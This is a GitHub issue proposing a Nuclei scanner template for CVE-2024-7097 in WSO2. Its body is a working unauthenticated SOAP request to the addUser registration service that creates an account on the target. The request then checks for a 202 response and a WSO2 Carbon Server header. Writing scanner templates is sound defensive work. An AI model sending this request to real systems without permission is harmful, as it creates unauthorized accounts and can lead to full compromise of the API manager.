### ISSUE TITLE
CVE-2024-7097

### ISSUE THREAD

**Issue by 3th1cyuk1** [projectdiscovery/nuclei-templates#11487]
### Is there an existing template for this?

- [x] I have searched the existing templates.

### Nuclei Template

```yaml
id: CVE-2024-7097

info:
  name: WSO2 User Registration Service
  author: 3th1c_yuk1
  severity: critical
  description: |
    Unauthenticated account creation that may lead to a fully compromised WSO2 API Manager. 
  reference:
     - https://x.com/gumgum_03/status/1879216053802422294
     - https://sec.vnpt.vn/2025/01/canh-bao-lo-hong-nghiem-trong-tren-nen-tang-xac-thuc-tap-trung-wso2-anh-huong-den-nhieu-co-quan-to-chuc-bo-ban-nganh/

http:
  - raw:
      - |
        POST /services/UserRegistrationAdminService/addUser HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
        Content-Type: text/xml;charset=UTF-8

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ax2445="http://org.apache.axis2/xsd" xmlns:xsd="http://dto.registration.user.identity.carbon.wso2.org/xsd">
           <soapenv:Header/>
           <soapenv:Body>
              <ax2445:addUser>
                 <ax2445:user>
                    <xsd:userName>BachTran</xsd:userName>
                    <xsd:password>ExamplePassword123</xsd:password>
                 </ax2445:user>
              </ax2445:addUser>
           </soapenv:Body>
        </soapenv:Envelope>

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 202

      - type: word
        part: header
        words:
          - "Server: WSO2 Carbon Server"
```

### Relevant dumped responses

```shell

```

### Anything else?

![Image](https://github.com/user-attachments/assets/bc3b4485-4a37-4bcc-94cd-356271645147)
